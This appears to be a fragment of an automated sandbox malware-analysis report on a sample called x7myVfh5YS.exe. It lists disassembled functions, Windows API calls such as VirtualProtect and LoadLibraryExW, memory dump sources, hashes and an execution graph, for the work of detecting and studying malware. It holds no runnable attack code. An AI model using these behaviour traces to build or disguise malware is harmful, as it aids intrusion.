                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: a2f43d2fbadf89e451208b9655b4e310ca4b3957285a0bcb7851fc24fbcfd451
                          • Instruction ID: 94175e2d64006a97b55bf4edefaec7191928b7e80d8c3ba2752c3dcab0a29d5d
                          • Opcode Fuzzy Hash: a2f43d2fbadf89e451208b9655b4e310ca4b3957285a0bcb7851fc24fbcfd451
                          • Instruction Fuzzy Hash: 0E21E732B06A10BBDB219B65DC50A4E77789B4B7E8B350225ED25A7B80D770EE01C6D1
                          Function 6CEE998C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,6CEE9983,6CEE96E0), ref: 6CEE999A
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CEE99A8
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CEE99C1
                          • SetLastError.KERNEL32(00000000,6CEE9983,6CEE96E0), ref: 6CEE9A13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 0babe6df32f24f99f9f81910505831beda08ce9d40ccbc8cbdfc395cc0528b61
                          • Instruction ID: 7a1c0316277bcfee87622f4657a728d4fc6932cddb0f2afc786f7daa98f23699
                          • Opcode Fuzzy Hash: 0babe6df32f24f99f9f81910505831beda08ce9d40ccbc8cbdfc395cc0528b61
                          • Instruction Fuzzy Hash: A101D47675D7216EEB2026766C856D73AB8DB0B3FD730072EE52452BD0EF5388055290
                          Function 6CEED4DE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          • C:\Users\user\Desktop\x7myVfh5YS.exe, xrefs: 6CEED4FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID: C:\Users\user\Desktop\x7myVfh5YS.exe
                          • API String ID: 0-3473576472
                          • Opcode ID: 70e88cdbd8d0dcc66cf39fc33045c75fce86ddfd36145c83ca8675eef997ceb6
                          • Instruction ID: 9754d157458a90722438b4e619bab74636d741f750d61898f31cfb9103134521
                          • Opcode Fuzzy Hash: 70e88cdbd8d0dcc66cf39fc33045c75fce86ddfd36145c83ca8675eef997ceb6
                          • Instruction Fuzzy Hash: E6215375204205EFDB10AF75885099A7779EF8D3AC7244519F92897B40E731EA18CB50
                          Function 6CEEB4EE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB9B7CD4,00000000,?,00000000,6CEF3DF2,000000FF,?,6CEEB488,?,?,6CEEB45C,?), ref: 6CEEB523
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CEEB535
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6CEF3DF2,000000FF,?,6CEEB488,?,?,6CEEB45C,?), ref: 6CEEB557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 594efda2ea15f0205773538cf5c6d1bb55cf062099607968d1669bbe18fd2077
                          • Instruction ID: a4fe59ae80b92f8f0fc9850d7d455f22d4e34fddc46da3792cf3cf1777bca5a9
                          • Opcode Fuzzy Hash: 594efda2ea15f0205773538cf5c6d1bb55cf062099607968d1669bbe18fd2077
                          • Instruction Fuzzy Hash: 5F01A236A04659EBDB018F54DD09FAE7BB9FB45759F204526E832A2680DB349900CA91
                          Function 6CEEA6DF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 6CEEA704
                          • CatchIt.LIBVCRUNTIME ref: 6CEEA7EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CatchEncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 1435073870-2084237596
                          • Opcode ID: 35964bf8bf80be2c4c9d331b23a06e7085fa6574eccc4963ca0c51803de52af1
                          • Instruction ID: d6e912a2c2f9da94ea1abfea8bd4f7ad2123cf4f964bcb3a58dfde257ec73eea
                          • Opcode Fuzzy Hash: 35964bf8bf80be2c4c9d331b23a06e7085fa6574eccc4963ca0c51803de52af1
                          • Instruction Fuzzy Hash: 36414672900209AFDF06CF95CC80AEEBBB5BF4C348F24815DE914A7660E3359A51DB51
                          Function 6CEE9F62 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CEE9F13,00000000,?,6CFCF0D0,?,?,?,6CEEA0B6,00000004,InitializeCriticalSectionEx,6CEF53E8,InitializeCriticalSectionEx), ref: 6CEE9F6F
                          • GetLastError.KERNEL32(?,6CEE9F13,00000000,?,6CFCF0D0,?,?,?,6CEEA0B6,00000004,InitializeCriticalSectionEx,6CEF53E8,InitializeCriticalSectionEx,00000000,?,6CEE9A82), ref: 6CEE9F79
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CEE9FA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: a8fdba91b658ceaa555af92f40fa3fccb1ebbf18b08c26d3903c08177a63de42
                          • Instruction ID: de1ae769a11f301bab9935e72b150b44dbbe07f501c4ed090bd2667a98b833a9
                          • Opcode Fuzzy Hash: a8fdba91b658ceaa555af92f40fa3fccb1ebbf18b08c26d3903c08177a63de42
                          • Instruction Fuzzy Hash: 0EE04831348208FBEF001AA1DD06B5D3EB59B45789F344035F91CEC591D7E2D550C995
                          Function 6CEF0672 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(BB9B7CD4), ref: 6CEF06D5
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CEF0927
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CEF096D
                          • GetLastError.KERNEL32 ref: 6CEF0A10
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 88f5ed461a235142f54b62152d2c7148721862a2361ffc66c2597e62de70b592
                          • Instruction ID: 7e443f2d98a616f601ffd91ad84aa2ba9d80e9b9dd9a476b3c9da5b1627c0533
                          • Opcode Fuzzy Hash: 88f5ed461a235142f54b62152d2c7148721862a2361ffc66c2597e62de70b592
                          • Instruction Fuzzy Hash: 59D17B75E012889FDF01CFA8C880AEDBBB5EF49318F24456AE465EB741E730A942CF50
                          Function 6CEEA0E3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 92e9e05965bcdc61c25f57d312b8b1cb89428022bf505fc0a7e20785e51081ef
                          • Instruction ID: fb245f2c64dfd3336bfef1ca2a532cb61d8d7e7d3bb1bc987607e43197962912
                          • Opcode Fuzzy Hash: 92e9e05965bcdc61c25f57d312b8b1cb89428022bf505fc0a7e20785e51081ef
                          • Instruction Fuzzy Hash: F15103B2685702AFDB148F55D880BAA7BB4FF0D398F30452DD82557B90E732E885CB50
                          Function 6CEECCF8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • GetLastError.KERNEL32 ref: 6CEECD5C
                          • __dosmaperr.LIBCMT ref: 6CEECD63
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6CEECD9D
                          • __dosmaperr.LIBCMT ref: 6CEECDA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 20a31cd6c39f1b08cb125a09d4b742a81b27af005b66ef67ec0fbcd5d26bb106
                          • Instruction ID: 28f0d9cbcdda8a51f4d453d833f565c567090a9f35386e666bd82ea97fea3942
                          • Opcode Fuzzy Hash: 20a31cd6c39f1b08cb125a09d4b742a81b27af005b66ef67ec0fbcd5d26bb106
                          • Instruction Fuzzy Hash: 0C21B631304225AFDB10AF66884089A7FBDFF4D3EC724861DE91997B40E731ED508790
                          Function 6CEEE14F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6CEEE157
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CEEE18F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CEEE1AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 0e47fe36104d26145009937901286059c30e73938323169c76b4b527633b6681
                          • Instruction ID: f2d3a87328585bece23c8ec5906ca2af8bc419701d29e4baf77cab03bd135a86
                          • Opcode Fuzzy Hash: 0e47fe36104d26145009937901286059c30e73938323169c76b4b527633b6681
                          • Instruction Fuzzy Hash: 2411A1B3605915BFAB1126BA5C88CAF7E7CDF9E2EC3240429F801A3700FB209E4585F0
                          Function 6CEF1FE7 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF1FFE
                          • GetLastError.KERNEL32(?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF200A
                            • Part of subcall function 6CEF1FCF: CloseHandle.KERNEL32(FFFFFFFE,6CEF201A,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF1FDF
                          • ___initconout.LIBCMT ref: 6CEF201A
                            • Part of subcall function 6CEF1F91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CEF1FC0,6CEF1793,?,?,6CEF0A64), ref: 6CEF1FA4
                          • WriteConsoleW.KERNEL32(?,?,?,00000000,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF202F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 217b512fa567aeed598a86a3e56f940606d782a8439160dbeb7757cfe229902c
                          • Instruction ID: 3cb2f9f2ad2fd9b33968d8192f83098d219b8d308eff18684879c684145c5b70
                          • Opcode Fuzzy Hash: 217b512fa567aeed598a86a3e56f940606d782a8439160dbeb7757cfe229902c
                          • Instruction Fuzzy Hash: 1EF01C37604158BBCF121FD5DD09A8A3F77EF493B4B144014FA2886620CB32C920DB91

                          Execution Graph

                          Execution Coverage:12.8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:14
                          Total number of Limit Nodes:0
                          execution_graph 61359 651d3c8 61360 651d40e KiUserCallbackDispatcher 61359->61360 61362 651d461 61360->61362 61363 12a4a40 61364 12a4a54 61363->61364 61366 12a59a4 61363->61366 61369 12ac9d0 61366->61369 61371 12ac9e3 61369->61371 61373 12aca80 61371->61373 61374 12acac8 VirtualProtect 61373->61374 61376 12a59ba 61374->61376 61377 12acc50 61378 12acc90 FindCloseChangeNotification 61377->61378 61380 12accc1 61378->61380

                          Executed Functions

                          Function 05AA1582 Relevance: 16.1, Strings: 12, Instructions: 1136COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                          • API String ID: 0-162385967
                          • Opcode ID: 440acdd55945503f9fed4a5f8b797d6aa3708b4be5df121dd9000d2f3a02f3e3
                          • Instruction ID: 70af60b2a20496e67110312edf31b602c3273222fe85a07f0ade7dd7d7675d84
                          • Opcode Fuzzy Hash: 440acdd55945503f9fed4a5f8b797d6aa3708b4be5df121dd9000d2f3a02f3e3
                          • Instruction Fuzzy Hash: 20B2E635A002289FDB14DFA8C994FADB7B6BF48300F158599E915AB3A5DB70EC81CF50
                          Function 05AA18B7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq$4$$jq$$jq$$jq$$jq
                          • API String ID: 0-3947795074
                          • Opcode ID: f299f42ed109e4e497023cc52e7a4bb9c4b30d9df33cbbd7c3239bdd2ce51ba1
                          • Instruction ID: 022f2c36778e2708359f38df0e96d195260d56c33c81b8657eb8baf531edf48e
                          • Opcode Fuzzy Hash: f299f42ed109e4e497023cc52e7a4bb9c4b30d9df33cbbd7c3239bdd2ce51ba1
                          • Instruction Fuzzy Hash: 3522F935A00219DFDB24DF65C984FADB7B6FF48300F1481A9E509AB2A5DB70AD85CF50
                          Function 02AE30A8 Relevance: 6.8, Strings: 5, Instructions: 598COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 858 2ae30a8-2ae30ea call 2ae29b0 863 2ae312c-2ae3139 858->863 864 2ae30ec-2ae30fc call 2ae29b0 858->864 865 2ae313b-2ae3140 863->865 866 2ae3142 863->866 870 2ae3288-2ae3292 864->870 871 2ae3102-2ae3108 864->871 868 2ae3147-2ae3170 865->868 866->868 877 2ae319c-2ae31a6 868->877 878 2ae3172-2ae317c 868->878 872 2ae32a4-2ae32bb 870->872 873 2ae3294-2ae329e 870->873 871->863 875 2ae310a-2ae3116 871->875 883 2ae37c0-2ae3824 872->883 889 2ae32c1-2ae32c8 872->889 873->872 876 2ae33bc-2ae33c6 873->876 879 2ae3118 875->879 880 2ae3122-2ae3126 875->880 885 2ae33cc-2ae33d6 876->885 886 2ae351a-2ae3524 876->886 877->883 884 2ae31ac-2ae31b9 877->884 882 2ae3182-2ae318f 878->882 878->883 879->880 880->863 880->870 882->883 890 2ae3195-2ae319a 882->890 905 2ae382c-2ae3835 883->905 906 2ae3826-2ae3829 883->906 884->883 891 2ae31bf 884->891 885->886 892 2ae33dc-2ae33f3 885->892 887 2ae352a-2ae3534 886->887 888 2ae36e1-2ae36ea 886->888 887->888 895 2ae353a-2ae3547 887->895 893 2ae37b5-2ae37bf 888->893 894 2ae36f0-2ae36fa 888->894 889->883 896 2ae32ce-2ae32d5 889->896 897 2ae31c4-2ae31d2 890->897 891->897 892->883 909 2ae33f9-2ae3400 892->909 900 2ae36fc-2ae36ff 894->900 901 2ae3727-2ae373b 894->901 902 2ae354d-2ae3562 895->902 903 2ae3549 895->903 896->883 904 2ae32db-2ae32e2 896->904 897->883 907 2ae31d8-2ae31e4 897->907 910 2ae370e-2ae3714 900->910 911 2ae3701-2ae3706 900->911 901->893 922 2ae373d-2ae3740 901->922 902->883 921 2ae3568-2ae356f 902->921 903->902 904->883 912 2ae32e8-2ae32ef 904->912 985 2ae3838 call 2ae309a 905->985 986 2ae3838 call 2ae30a8 905->986 907->883 908 2ae31ea-2ae323b 907->908 957 2ae327f-2ae3281 908->957 958 2ae323d-2ae3278 908->958 909->883 914 2ae3406-2ae340d 909->914 910->883 915 2ae371a-2ae3725 910->915 911->910 912->883 918 2ae32f5-2ae32fc 912->918 913 2ae383b-2ae3853 914->883 920 2ae3413-2ae341a 914->920 915->900 915->901 918->883 923 2ae3302-2ae3309 918->923 920->883 924 2ae3420-2ae3427 920->924 921->883 925 2ae3575-2ae3582 921->925 926 2ae374f-2ae3755 922->926 927 2ae3742-2ae3747 922->927 923->883 928 2ae330f-2ae331d 923->928 924->883 930 2ae342d-2ae3434 924->930 925->883 931 2ae3588-2ae3595 925->931 926->883 932 2ae3757-2ae375e 926->932 927->926 928->883 933 2ae3323-2ae333b 928->933 930->883 936 2ae343a-2ae3441 930->936 931->883 937 2ae359b-2ae35a2 931->937 934 2ae376d-2ae3779 932->934 935 2ae3760-2ae3765 932->935 943 2ae334c-2ae3351 933->943 944 2ae333d-2ae3340 933->944 934->883 939 2ae377b-2ae378e 934->939 935->934 936->883 941 2ae3447-2ae344e 936->941 937->883 942 2ae35a8-2ae3615 937->942 954 2ae379d-2ae37a3 939->954 955 2ae3790-2ae3795 939->955 941->883 945 2ae3454-2ae3513 941->945 967 2ae361b-2ae36d1 942->967 968 2ae36d8-2ae36da 942->968 947 2ae3362-2ae3365 943->947 948 2ae3353-2ae3356 943->948 944->883 946 2ae3346-2ae334a 944->946 945->886 952 2ae336f-2ae3384 946->952 947->883 956 2ae336b 947->956 948->883 953 2ae335c-2ae3360 948->953 952->883 962 2ae338a-2ae33a9 952->962 953->952 954->883 961 2ae37a5-2ae37b3 954->961 955->954 956->952 957->870 958->957 961->893 961->922 962->883 963 2ae33af-2ae33b5 962->963 963->876 967->968 968->888 985->913 986->913
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $A$E$T$U
                          • API String ID: 0-1503325869
                          • Opcode ID: bab4e079f1db4938cf41bdc7d05b2de850fca89d6f66912ec1eee2aa078b2f21
                          • Instruction ID: 594c6857a92192eb4268293f7c62a373bfce60ddfa64a714d41061256c195e2f
                          • Opcode Fuzzy Hash: bab4e079f1db4938cf41bdc7d05b2de850fca89d6f66912ec1eee2aa078b2f21
                          • Instruction Fuzzy Hash: F422C070E002448FDF11DB68C885BBEBBB3AF85304F19C5E9D4566B296DB34D886CB91
                          Function 02AE20E8 Relevance: 4.3, Strings: 3, Instructions: 598COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
